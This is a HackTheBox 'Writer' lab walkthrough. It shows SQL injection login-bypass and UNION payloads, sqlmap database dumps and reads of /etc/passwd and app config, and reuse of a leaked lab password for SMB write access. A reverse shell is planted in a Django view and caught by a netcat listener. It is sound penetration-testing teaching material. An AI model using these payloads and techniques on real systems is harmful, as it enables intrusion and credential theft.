This post is a walkthrough of the HackTheBox machine Writer.
Hackthebox Writer Walkthrough

Reconnaissance
Port/Vuln Enumeration
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.11.101
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:46 EDT
Nmap scan report for 10.10.11.101
Host is up (0.048s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 7.82 seconds
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.11.101
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:49 EDT
Warning: 10.10.11.101 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.101
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.11.101 are open|filtered (65483) or closed (52)
Nmap done: 1 IP address (1 host up) scanned in 46.59 seconds
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ nmap -Pn -p 22,80,139,445 -sC -sV -oN details1.txt 10.10.11.101
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:51 EDT
Nmap scan report for 10.10.11.101
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-06-10T23:51:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds
Directory scan and http enumeration
(rocky㉿kali)-[~]
└─$ nikto -h http://10.10.11.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.101
+ Target Hostname: 10.10.11.101
+ Target Port: 80
+ Start Time: 2022-06-10 20:02:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET
+ OSVDB-3268: /static/: Directory indexing found.
+ 7889 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-06-10 20:09:00 (GMT-4) (398 seconds)

gobuster dir -u http://10.10.11.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.101
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/10 20:01:46 Starting gobuster in directory enumeration mode
===============================================================
/contact (Status: 200) [Size: 4905]
/about (Status: 200) [Size: 3522]
/static (Status: 301) [Size: 313] [--> http://10.10.11.101/static/]
/logout (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/dashboard (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/administrative (Status: 200) [Size: 1443]
/server-status (Status: 403) [Size: 277]
SMB enumeration
Ports 139 and 445 are open, so the next step is to enumerate SMB. enum4linux with a null session gives users, shares and RID-cycling results in one pass:
enum4linux 10.10.11.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun 10 20:14:55 2022
==========================
| Target Information |
==========================
Target ........... 10.10.11.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.11.101 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 10.10.11.101 |
============================================
Looking up status of 10.10.11.101
WRITER <00> - B <ACTIVE> Workstation Service
WRITER <03> - B <ACTIVE> Messenger Service
WRITER <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 10.10.11.101 |
=====================================
[+] Server 10.10.11.101 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.11.101 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 10.10.11.101 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.11.101 from smbclient:
[+] Got OS info for 10.10.11.101 from srvinfo:
WRITER Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 10.10.11.101 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: kyle Name: Kyle Travis Desc:
user:[kyle] rid:[0x3e8]
=========================================
| Share Enumeration on 10.10.11.101 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
writer2_project Disk
IPC$ IPC IPC Service (writer server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.11.101
//10.10.11.101/print$ Mapping: DENIED, Listing: N/A
//10.10.11.101/writer2_project Mapping: DENIED, Listing: N/A
//10.10.11.101/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
==============================
| Groups on 10.10.11.101 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.11.101 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1663171886-1921258872-720408159
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1663171886-1921258872-720408159 and logon username '', password ''
S-1-5-21-1663171886-1921258872-720408159-500 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-501 WRITER\nobody (Local User)
S-1-5-21-1663171886-1921258872-720408159-508 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-509 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-510 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-511 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-512 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-513 WRITER\None (Domain Group)
S-1-5-21-1663171886-1921258872-720408159-514 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-515 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-522 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-523 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-548 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-549 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-550 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1000 WRITER\kyle (Local User)
S-1-5-21-1663171886-1921258872-720408159-1001 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1002 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1048 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1049 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kyle (Local User)
S-1-22-1-1001 Unix User\john (Local User)
The null session gave us two local usernames, kyle and john, and two non-default shares, print$ and writer2_project, but mapping them anonymously is denied. We need valid credentials before these shares are useful, so we park this and carry on after one more check that no share allows anonymous access.

Trying the writer2_project share directly confirms that it is not readable anonymously:
smbclient \\\\10.10.11.101/writer2_project
Enter WORKGROUP\rocky's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
We come back to this share once we have a password for one of the users found above, kyle or john.

Bruteforce
We now have usernames but no password, so the first idea is to brute-force SSH for kyle with hydra:
hydra -l kyle -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.101 -VV -f -t 60
This does eventually produce a result, but it takes hours, and hydra itself warns that most SSH servers limit parallel connections and recommends -t 4, so in practice the brute force is best avoided in favour of the web application below. For reference, the SSH login once the password is known:
ssh kyle@10.10.11.101
The authenticity of host '10.10.11.101 (10.10.11.101)' can't be established.
ED25519 key fingerprint is SHA256:EcmD06Im3Ox+/6cWwJX2eaLFPlgm/TO0Jw20KJK1XSw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.101' (ED25519) to the list of known hosts.
kyle@10.10.11.101's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
SQL Injection
The main page of the site shows a few blog posts:

Appending a single quote to a post URL returns the same page with no error. That on its own does not prove injection, but an application that silently accepts a stray quote is worth probing further, and we already have a login form to probe.

The login page at /administrative (found in the directory scan) is the obvious place to try. The classic authentication-bypass string 'or' '=' 'or' in both the username and password fields logged me into the "Admin Panel":

Let's look more closely at the dashboard reached with this basic login bypass. Either of these strings in the username field gets in:
admin' or 1=1 limit 1;-- -
'or' '=' 'or'
These are the standard authentication-bypass payloads; a longer list is in the OWASP Bricks "Login page #1" SQL injection exercise.

The dashboard looks like below

Theory behind this injection
A login query of this kind is typically built as
select * from users where username = '[username]' and password = hash('[password]');
with the submitted values pasted straight into the string. The bypass payload closes the username literal, adds a condition that is always true, and comments out the rest of the query, so the password check is never evaluated. These payloads are the ones to reach for when no valid username or password is known; the OWASP Bricks page referenced above walks through the same idea.

select * from users where username = 'admin' or 1=1 limit 1;-- -' and password = [hash];
Fuzzing method to confirm the SQL injection
Here the most common payload worked first time. If you would rather not guess by hand, fuzz the username field with the SQLi wordlist from SecLists. The ffuf options used:
-X POST: send POST requests
-u http://10.10.11.101/administrative: the URL to fuzz
-d 'uname=FUZZ&password=testpassword': the POST body; FUZZ is replaced by each wordlist entry
-w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt: the wordlist
-H "Content-Type: application/x-www-form-urlencoded": the form content type (I always set it for POST bodies)
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -H "Content-Type: application/x-www-form-urlencoded" --fw 206
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://10.10.11.101/administrative
:: Wordlist : FUZZ: /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : uname=FUZZ&password=testpassword
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 206
________________________________________________
admin' or ' [Status: 200, Size: 1296, Words: 280, Lines: 33]
hi' or 'x'='x'; [Status: 200, Size: 1296, Words: 280, Lines: 33]
x' or 1=1 or 'x'='y [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 1=1 or ''=' [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 0=0 # [Status: 200, Size: 1296, Words: 280, Lines: 33]
:: Progress: [267/267] :: Job [1/1] :: 535 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
Why the additional option --fw 206
Without the filter the output is noisy: every failed login returns the same login page, which is 206 words long. Filtering out responses with 206 words (--fw 206) leaves only the responses that differ, which are the payloads that got past the login. Compare the output without the filter:

To watch the requests in Burp, add the proxy option (-x) as well:
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -x http://127.0.0.1:8080 -H "Content-Type: application/x-www-form-urlencoded" --fw 206
Logging in with one of the ffuf results works as well:


Intercepting the login in Burp shows the POST parameters, uname and password:

As mentioned earlier, the login query looks like this:
select * from users where username = '[username]' and password = hash('[password]');
If we submit a UNION payload as the username,
' UNION select 1;-- -
the query becomes
select * from users where username = '' UNION select 1;-- -' and password = hash('[password]');
The leading ' is what closes the string literal the application opened around the username; without it the UNION is just part of the username text and never reaches the parser. The ;-- - at the end comments out the rest of the original query, including the password check.
A UNION only succeeds when both SELECTs return the same number of columns, so I kept adding columns: ' UNION select 1,2,3;-- - and so on. The response did not change until the payload had 6 columns, at which point the dashboard greeted me with "Welcome 2":

This tells us the query selects 6 columns and that the second one is what the dashboard prints as the username (previously "Welcome admin"). Any expression we place in that second position is reflected in the page, so we can replace it with queries to enumerate the database.
To find the current database
uname=' UNION select 1,database(),3,4,5,6;-- -&password=test

To Find all databases
uname=' UNION select 1,schema_name,3,4,5,6 from information_schema.schemata;-- -&password=test

To make this more readable, wrap it in group_concat() so all rows come back in the single reflected field:
uname=' UNION select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata;-- -&password=test
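The following is an added example, not code from the original write-up or from the Writer application: a scale model of the login query in Python, with an in-memory SQLite database standing in for MariaDB. It covers both the bypass explained in the theory section and the UNION probing just shown. The table layout and the stored hash are constructed (column 2 is the username, to match the "Welcome 2" observation; MD5 is assumed for hash() because the dumped admin hash is 32 hex characters). SQLite has no information_schema, so sqlite_master takes the place of information_schema.schemata, and the ; before -- - is left out (it is not needed in either engine).

```python
"""Scale model of the writer.htb login: string-built SQL versus bound parameters,
plus the UNION column-count probe and group_concat() extraction from the post.
Everything here (table, row, hash) is constructed for the demo."""
import hashlib
import sqlite3


def make_db():
    """Stand-in for the writer.users table; column 2 is the username."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users(id INTEGER, username TEXT, email TEXT, "
        "status TEXT, password TEXT, date_created TEXT)"
    )
    fake_hash = hashlib.md5(b"constructed-password").hexdigest()  # constructed, not the real hash
    db.execute(
        "INSERT INTO users VALUES (1, 'admin', 'admin@writer.htb', 'Active', ?, NULL)",
        (fake_hash,),
    )
    return db


def vulnerable_login(db, uname, password):
    """The pattern the post reconstructs: user input spliced into the SQL text."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (f"select * from users where username = '{uname}' "
           f"and password = '{pw_hash}'")
    try:
        return db.execute(sql).fetchone()
    except (sqlite3.Error, sqlite3.Warning):
        # A syntax error is swallowed and the login page is simply redrawn:
        # the "same page, no error" behaviour the post observed.
        return None


def safe_login(db, uname, password):
    """Same query with bound parameters: the quote never leaves the string."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return db.execute(
        "select * from users where username = ? and password = ?",
        (uname, pw_hash),
    ).fetchone()


def welcome_name(db, uname, password="test"):
    """What the dashboard greets you with: column 2 of the first row returned."""
    row = vulnerable_login(db, uname, password)
    return None if row is None else row[1]


def find_column_count(db, max_cols=10):
    """Grow the UNION until the column counts match and a row comes back."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if vulnerable_login(db, f"' UNION select {cols}-- -", "test") is not None:
            return n
    return None


# Bypass strings from the post (login section and ffuf results); each one
# turns the WHERE clause into a tautology and returns the first user row.
BYPASS_PAYLOADS = [
    "admin' or 1=1 limit 1-- -",
    "'or' '=' 'or'",
    "' or 1=1 or ''='",
]

# sqlite_master plays the role information_schema.schemata plays in MySQL.
ENUM_PAYLOAD = "' UNION select 1,group_concat(name),3,4,5,6 from sqlite_master-- -"

if __name__ == "__main__":
    db = make_db()
    for p in BYPASS_PAYLOADS:
        print(f"{p!r:32} vulnerable -> {welcome_name(db, p)!r}   safe -> {safe_login(db, p, 'test')}")
    print("columns in the SELECT :", find_column_count(db))
    print("tables via UNION      :", welcome_name(db, ENUM_PAYLOAD))
```

Run it directly to see each payload against both versions of the query. The parameterised safe_login is the fix: the quote arrives as data, so every bypass string is just a username that does not exist, and the UNION probe never reaches the parser.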

Enumeration using sqlmap
Everything found above by hand in Burp can also be pulled out with sqlmap. Capture a login request in Burp, save it to a file (here newlogin.request) and pass it with -r.


sqlmap finds the same injection points:
$ ls
alltcp.txt alludp.txt details1.txt login.request log.req newlogin.request
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ sqlmap -r newlogin.request
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:55:05 /2022-06-14/
[19:55:05] [INFO] parsing HTTP request from 'newlogin.request'
[19:55:06] [INFO] resuming back-end DBMS 'mysql'
[19:55:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[19:55:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[19:55:06] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
[19:55:06] [WARNING] your sqlmap version is outdated
[*] ending @ 19:55:06 /2022-06-14/
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ sqlmap -r newlogin.request --dbs
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:55:51 /2022-06-14/
[19:55:51] [INFO] parsing HTTP request from 'newlogin.request'
[19:55:51] [INFO] resuming back-end DBMS 'mysql'
[19:55:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[19:55:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[19:55:52] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] writer
[19:55:52] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
[19:55:52] [WARNING] your sqlmap version is outdated
[*] ending @ 19:55:52 /2022-06-14/
sqlmap also reports two databases. Let's list the tables in writer:
sqlmap -r newlogin.request -D writer --tables
[19:58:33] [INFO] fetching tables for database: 'writer'
Database: writer
[3 tables]
+---------+
| site |
| stories |
| users |
+---------+
Now dump the data in these tables:
sqlmap -r newlogin.request -D writer -T site --dump
Database: writer
Table: site
[1 entry]
+----+---------------+------------+------------------+------------+----------------------------------------------------------+
| id | logo | title | favicon | ganalytics | description |
+----+---------------+------------+------------------+------------+----------------------------------------------------------+
| 1 | /img/logo.png | Story Bank | /img/favicon.ico | <blank> | This is a site where I publish my own and others stories |
+----+---------------+------------+------------------+------------+----------------------------------------------------------+
sqlmap -r newlogin.request -D writer -T users --dump
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | admin@writer.htb | Active | 118e48794631a9612484ca8b55f622d0 | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+
Although this gives us the admin password hash (32 hex characters, consistent with MD5), hashcat with rockyou was taking a long time without a result, so I skipped cracking it.
Remote file read with SQL injection
MySQL's LOAD_FILE() requires the FILE privilege, so first check what the database user has (secure_file_priv can still restrict which paths are readable):
sqlmap -r newlogin.request --privileges
[20:20:03] [INFO] fetching database users privileges
got a refresh intent (redirect like response common to login pages) to '/dashboard'. Do you want to apply it from now on? [Y/n] n
database management system users privileges:
[*] 'admin'@'localhost' [1]:
privilege: FILE
The admin database user has FILE, so let's try reading some system files:
sqlmap -r newlogin.request --file-read=/etc/lsb-release
[20:52:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_lsb-release (size differs from remote file)
[20:52:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
sqlmap writes the retrieved file to the local path shown; given the "size differs" warning, check that the local copy reads cleanly before relying on it:

The same file read can be done by hand in Burp by placing load_file('/etc/lsb-release') in the reflected second column of the UNION payload:

Let's read more files with sqlmap:
sqlmap -r newlogin.request --file-read=/etc/passwd
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd (size differs from remote file)
[21:40:44] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10
cat /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
The accounts with a login shell are kyle and john, matching the SMB enumeration.
Since the web server is Apache, the default site configuration is the next file to read:
sqlmap -r new.req --file-read=/etc/apache2/sites-enabled/000-default.conf
[21:00:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:00:43] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_apache2_sites-enabled_000-default.conf (size differs from remote file)
[21:00:43] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'

The virtual host configuration references the WSGI script /var/www/writer.htb/writer.wsgi, so read that next:
sqlmap -r new.req --file-read=/var/www/writer.htb/writer.wsgi
[21:20:44] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_var_www_writer.htb_writer.wsgi (size differs from remote file)
[*] ending @ 21:20:44 /2022-06-15/
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ cat home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_var_www_writer.htb_writer.wsg

The WSGI script imports the application from the package's __init__.py. Reading that file with sqlmap as well turns up some interesting parameters, including a hard-coded password:

Let's try this password against the SMB share we could not read anonymously, using the usernames from /etc/passwd. Password reuse between an application config and a user account is common, and here kyle's account accepts it:
└─$ smbmap -H 10.10.11.101 -u kyle -p ToughPasswordToCrack
[+] IP: 10.10.11.101:445 Name: 10.10.11.101
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
writer2_project READ, WRITE
IPC$ NO ACCESS IPC Service (writer server (Samba, Ubuntu))
kyle has read and write access to writer2_project. With smbclient we can browse it:
smbclient //10.10.11.101/writer2_project -U \\kyle%ToughPasswordToCrack
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jun 16 19:48:11 2022
.. D 0 Tue Jun 22 13:55:06 2021
static D 0 Sun May 16 16:29:16 2021
staticfiles D 0 Fri Jul 9 06:59:42 2021
writer_web D 0 Wed May 19 11:26:18 2021
requirements.txt N 15 Thu Jun 16 19:54:01 2022
writerv2 D 0 Wed May 19 08:32:41 2021
manage.py N 806 Thu Jun 16 19:54:01 2022
smb: \> cd writer_web\
smb: \writer_web\> ls
. D 0 Wed May 19 11:26:18 2021
.. D 0 Thu Jun 16 19:48:11 2022
apps.py N 133 Thu Jun 16 19:56:01 2022
views.py A 181 Thu Jun 16 19:56:01 2022
__init__.py N 0 Thu Jun 16 19:56:01 2022
urls.py N 127 Thu Jun 16 19:56:01 2022
tests.py N 60 Thu Jun 16 19:56:01 2022
__pycache__ D 0 Wed May 19 17:06:02 2021
admin.py N 63 Thu Jun 16 19:56:01 2022
models.py N 98 Thu Jun 16 19:56:01 2022
templates D 0 Tue May 18 09:43:07 2021
cat views.py
from django.shortcuts import render
from django.views.generic import TemplateView
def home_page(request):
template_name = "index.html"
return render(request,template_name)
These are the files of a Django app. views.py is trivial: home_page() renders index.html for every visit to the site, which means any Python added to it runs in the web server's process the next time the page is requested.
I added a one-line Python reverse shell to this file.

Then I uploaded the modified file back to the share under the same name.
Refreshing the site triggers the view, and the netcat listener receives a shell:
─(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.101] 50442
/bin/sh: 0: can't access tty; job control turned off
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh: 2: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
whoami
www-data
bash-5.0$
manage.py is Django's management entry point. Its dbshell command opens a database client with the credentials from the project's settings, so from the www-data shell we can query the development database without needing its password:
python3 manage.py dbshell
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4739
Server version: 10.3.29-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| dev |
| information_schema |
+--------------------+
